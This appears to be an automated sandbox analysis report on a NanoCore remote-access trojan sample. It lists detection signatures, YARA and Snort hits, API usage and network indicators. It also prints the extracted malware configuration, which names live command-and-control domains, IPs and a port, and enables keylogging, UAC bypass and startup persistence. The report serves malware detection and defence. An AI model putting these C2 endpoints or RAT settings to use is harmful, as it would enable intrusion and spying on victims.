Windows Analysis Report
P05jmXYKpr.exe

Overview

General Information

Sample Name: P05jmXYKpr.exe
Original Sample Name: db555a9de355c70681e2e5f9ed38a335.exe
Analysis ID: 877862
MD5: db555a9de355c70681e2e5f9ed38a335
SHA1: 07534d5012526f6bdec5314a4d140de5d94672ea
SHA256: fb25c8a64c09f9c4e8c586b94d5cda1dc69be203b786ea297f9293d7bd7b8b30
Tags: exeNanoCoreRAT

Detection

Nanocore
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Sigma detected: NanoCore
Detected Nanocore Rat
Yara detected AntiVM autoit script
Antivirus detection for URL or domain
Yara detected Nanocore RAT
Snort IDS alert for network traffic
Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Sigma detected: Scheduled temp file as task from temp location
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Starts an encoded Visual Basic Script (VBE)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Allocates memory in foreign processes
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Uses ipconfig to lookup or modify the Windows network settings
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses dynamic DNS services
Writes to foreign memory regions
Protects its processes via BreakOnTermination flag
Contains functionality to modify clipboard data
C2 URLs / IPs found in malware configuration
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to simulate keystroke presses
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
OS version to string mapping found (often used in BOTs)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
Contains functionality to query the security center for anti-virus and firewall products
Contains functionality to execute programs as a different user
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to communicate with device drivers
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Creates a DirectInput object (often for capturing keystrokes)
AV process strings found (often used to terminate AV products)
Installs a raw input device (often for capturing keystrokes)
File is packed with WinRar
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Contains functionality to launch a program with higher privileges
Potential key logger detected (key state polling based)
Contains functionality to simulate mouse events
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Classification

AV Detection

Source: december2nd.ddns.net Avira URL Cloud: Label: malware
Source: december2n.duckdns.org Avira URL Cloud: Label: malware
Source: Yara match File source: 13.2.RegSvcs.exe.6d10000.18.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.RegSvcs.exe.6d14629.17.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.RegSvcs.exe.4982365.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.3.boaliim.dat.1995c58.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.3.boaliim.dat.192cc48.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.RegSvcs.exe.4838611.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.RegSvcs.exe.1100000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.3.boaliim.dat.192cc48.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.3.boaliim.dat.192cc48.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.3.boaliim.dat.1995c58.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.3.boaliim.dat.1995c58.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.3.boaliim.dat.1995c58.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.RegSvcs.exe.4833fe8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.RegSvcs.exe.6d10000.18.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.RegSvcs.exe.4833fe8.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.3.boaliim.dat.192cc48.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.RegSvcs.exe.4977af2.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.RegSvcs.exe.497c92f.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.RegSvcs.exe.4982365.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000003.419593137.000000000192C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.419481281.00000000018F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.419137772.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.633014703.0000000001102000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.636564713.00000000037C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.419113322.000000000192D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.419304447.0000000001964000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.419527075.00000000042A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.643242754.0000000004829000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.649506775.0000000006D10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.419176316.0000000001995000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: boaliim.dat PID: 7512, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 7772, type: MEMORYSTR
Source: 0000000D.00000002.643242754.0000000004829000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "72ec1ea3-16bf-4e76-a7cf-15ed5e2a", "Group": "Marcello", "Domain1": "december2n.duckdns.org", "Domain2": "december2nd.ddns.net", "Port": 61715, "KeyboardLogging": "Enable", "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Enable", "SetCriticalProcess": "Enable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Enable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n <RegistrationInfo />\r\n <Triggers />\r\n <Principals>\r\n <Principal id=\"Author\">\r\n <LogonType>InteractiveToken</LogonType>\r\n <RunLevel>HighestAvailable</RunLevel>\r\n </Principal>\r\n </Principals>\r\n <Settings>\r\n <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n <AllowHardTerminate>true</AllowHardTerminate>\r\n <StartWhenAvailable>false</StartWhenAvailable>\r\n <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n <IdleSettings>\r\n <StopOnIdleEnd>false</StopOnIdleEnd>\r\n <RestartOnIdle>false</RestartOnIdle>\r\n </IdleSettings>\r\n <AllowStartOnDemand>true</AllowStartOnDemand>\r\n <Enabled>true</Enabled>\r\n <Hidden>false</Hidden>\r\n <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n <WakeToRun>false</WakeToRun>\r\n <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n <Priority>4</Priority>\r\n </Settings>\r\n <Actions 
Context=\"Author\">\r\n <Exec>\r\n <Command>\"#EXECUTABLEPATH\"</Command>\r\n <Arguments>$(Arg0)</Arguments>\r\n </Exec>\r\n </Actions>\r\n</Task"}
Source: P05jmXYKpr.exe ReversingLabs: Detection: 70%
Source: P05jmXYKpr.exe Virustotal: Detection: 68%
Source: december2nd.ddns.net Virustotal: Detection: 16%
Source: december2n.duckdns.org Virustotal: Detection: 19%
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat ReversingLabs: Detection: 52%
Source: P05jmXYKpr.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: P05jmXYKpr.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: P05jmXYKpr.exe
Source: Binary string: \??\C:\Windows\dll\System.pdb source: RegSvcs.exe, 0000000D.00000003.467685686.0000000001C53000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: RegSvcs.pdb, source: RegSvcs.exe, 0000000D.00000000.419225570.0000000000D22000.00000002.00000001.01000000.0000000C.sdmp, RegSvcs.exe.7.dr, dhcpmon.exe.13.dr
Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\NanoProtectPlugin\NanoProtectClient\obj\Debug\NanoProtectClient.pdb source: RegSvcs.exe, 0000000D.00000002.636564713.00000000037C1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.648908774.0000000005F60000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\MyNanoCore RemoteScripting\MyClientPlugin\obj\Debug\MyClientPluginNew.pdb source: RegSvcs.exe, 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.651126783.0000000007AA0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.pdbj source: RegSvcs.exe, 0000000D.00000003.482399735.0000000001C53000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000003.467685686.0000000001C53000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: RegSvcs.pdb source: RegSvcs.exe, 0000000D.00000000.419225570.0000000000D22000.00000002.00000001.01000000.0000000C.sdmp, RegSvcs.exe, 0000000D.00000002.634072543.0000000001BEA000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe.7.dr, dhcpmon.exe.13.dr
Source: Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: RegSvcs.exe, 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.651206131.0000000007AC0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: RegSvcs.exe, 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.651288244.0000000007AE0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: RegSvcs.exe, 0000000D.00000002.651096129.0000000007A90000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: RegSvcs.exe, 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.651236156.0000000007AD0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: RegSvcs.exe, 0000000D.00000002.651171603.0000000007AB0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\P05jmXYKpr.exe Code function: 0_2_0095A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError, 0_2_0095A69B
Source: C:\Users\user\Desktop\P05jmXYKpr.exe Code function: 0_2_0096C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW, 0_2_0096C220
Source: C:\Users\user\Desktop\P05jmXYKpr.exe Code function: 0_2_0097B348 FindFirstFileExA, 0_2_0097B348
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat Code function: 7_2_002BE387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 7_2_002BE387
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat Code function: 7_2_002BD836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 7_2_002BD836
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat Code function: 7_2_002CA0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 7_2_002CA0FA
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat Code function: 7_2_002CA488 FindFirstFileW,Sleep,FindNextFileW,FindClose, 7_2_002CA488
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat Code function: 7_2_002C65F1 FindFirstFileW,FindNextFileW,FindClose, 7_2_002C65F1
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat Code function: 7_2_0028C642 FindFirstFileExW, 7_2_0028C642
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat Code function: 7_2_002C7248 FindFirstFileW,FindClose, 7_2_002C7248
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat Code function: 7_2_002C72E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 7_2_002C72E9
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat Code function: 7_2_002BDB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 7_2_002BDB69

Networking

Source: Traffic Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49699 -> 192.169.69.26:61715
Source: Traffic Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49700 -> 192.169.69.26:61715
Source: Traffic Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49701 -> 192.169.69.26:61715
Source: Traffic Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49702 -> 212.193.30.230:61715
Source: Traffic Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.3:49702 -> 212.193.30.230:61715
Source: Traffic Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49703 -> 212.193.30.230:61715
Source: Traffic Snort IDS: 2841753 ETPRO TROJAN NanoCore RAT Keep-Alive Beacon (Inbound) 212.193.30.230:61715 -> 192.168.2.3:49703
Source: Traffic Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.3:49703 -> 212.193.30.230:61715
Source: Traffic Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49704 -> 212.193.30.230:61715
Source: Traffic Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.3:49704 -> 212.193.30.230:61715
Source: Traffic Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49705 -> 212.193.30.230:61715
Source: Traffic Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.3:49705 -> 212.193.30.230:61715
Source: unknown DNS query: name: december2n.duckdns.org
Source: unknown DNS query: name: december2nd.ddns.net
Source: Malware configuration extractor URLs: december2n.duckdns.org
Source: Malware configuration extractor URLs: december2nd.ddns.net
Source: Joe Sandbox View ASN Name: SPD-NETTR
Source: Joe Sandbox View ASN Name: WOWUS
Source: Joe Sandbox View IP Address: 212.193.30.230
Source: global traffic TCP traffic: 192.168.2.3:49702 -> 212.193.30.230:61715
Source: P05jmXYKpr.exe, 00000000.00000003.377814211.0000000007236000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat.0.dr String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: P05jmXYKpr.exe, 00000000.00000003.377814211.0000000007236000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat.0.dr String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: P05jmXYKpr.exe, 00000000.00000003.377814211.0000000007236000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat.0.dr String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: P05jmXYKpr.exe, 00000000.00000003.381445625.0000000003082000.00000004.00000020.00020000.00000000.sdmp, P05jmXYKpr.exe, 00000000.00000003.381359513.0000000003080000.00000004.00000020.00020000.00000000.sdmp, P05jmXYKpr.exe, 00000000.00000003.380745820.0000000003080000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat.0.dr String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: P05jmXYKpr.exe, 00000000.00000003.377814211.0000000007236000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat.0.dr String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: RegSvcs.exe, 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.651236156.0000000007AD0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://google.com
Source: P05jmXYKpr.exe, 00000000.00000003.377814211.0000000007236000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat.0.dr String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: P05jmXYKpr.exe, 00000000.00000003.377814211.0000000007236000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat.0.dr String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: P05jmXYKpr.exe, 00000000.00000003.381445625.0000000003082000.00000004.00000020.00020000.00000000.sdmp, P05jmXYKpr.exe, 00000000.00000003.381359513.0000000003080000.00000004.00000020.00020000.00000000.sdmp, P05jmXYKpr.exe, 00000000.00000003.377814211.0000000007236000.00000004.00000020.00020000.00000000.sdmp, P05jmXYKpr.exe, 00000000.00000003.380745820.0000000003080000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat.0.dr String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: P05jmXYKpr.exe, 00000000.00000003.377814211.0000000007236000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat.0.dr String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: RegSvcs.exe, 0000000D.00000002.636564713.00000000037C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: P05jmXYKpr.exe, 00000000.00000003.377814211.0000000007236000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat.0.dr String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: P05jmXYKpr.exe, 00000000.00000003.377814211.0000000007236000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat.0.dr String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: P05jmXYKpr.exe, 00000000.00000003.377814211.0000000007236000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat.0.dr String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: P05jmXYKpr.exe, 00000000.00000003.377814211.0000000007236000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat.0.dr String found in binary or memory: https://www.globalsign.com/repository/0
Source: unknown DNS traffic detected: queries for: december2n.duckdns.org
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat Code function: 7_2_002CD7A1 InternetReadFile,SetEvent,GetLastError,SetEvent, 7_2_002CD7A1

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat Code function: 7_2_002CF6C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 7_2_002CF6C7
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat Code function: 7_2_002BA54A GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState, 7_2_002BA54A
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat Code function: 7_2_002CF45C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 7_2_002CF45C
Source: boaliim.dat, 00000007.00000002.429505208.00000000017EA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: RegSvcs.exe, 0000000D.00000002.643242754.0000000004829000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: RegisterRawInputDevices
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat Code function: 7_2_002E9ED5 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 7_2_002E9ED5

E-Banking Fraud

Source: Yara match File source: 13.2.RegSvcs.exe.6d10000.18.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.RegSvcs.exe.6d14629.17.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.RegSvcs.exe.4982365.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.3.boaliim.dat.1995c58.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.3.boaliim.dat.192cc48.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.RegSvcs.exe.4838611.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.RegSvcs.exe.1100000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.3.boaliim.dat.192cc48.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.3.boaliim.dat.192cc48.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.3.boaliim.dat.1995c58.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.3.boaliim.dat.1995c58.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.3.boaliim.dat.1995c58.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.RegSvcs.exe.4833fe8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.RegSvcs.exe.6d10000.18.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.RegSvcs.exe.4833fe8.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.3.boaliim.dat.192cc48.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.RegSvcs.exe.4977af2.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.RegSvcs.exe.497c92f.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.RegSvcs.exe.4982365.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000003.419593137.000000000192C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.419481281.00000000018F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.419137772.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.633014703.0000000001102000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.636564713.00000000037C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.419113322.000000000192D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.419304447.0000000001964000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.419527075.00000000042A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.643242754.0000000004829000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.649506775.0000000006D10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.419176316.0000000001995000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: boaliim.dat PID: 7512, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 7772, type: MEMORYSTR

Operating System Destruction

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: 01 00 00 00 Jump to behavior

System Summary

Source: 13.2.RegSvcs.exe.3850378.3.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.3850378.3.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.3850378.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
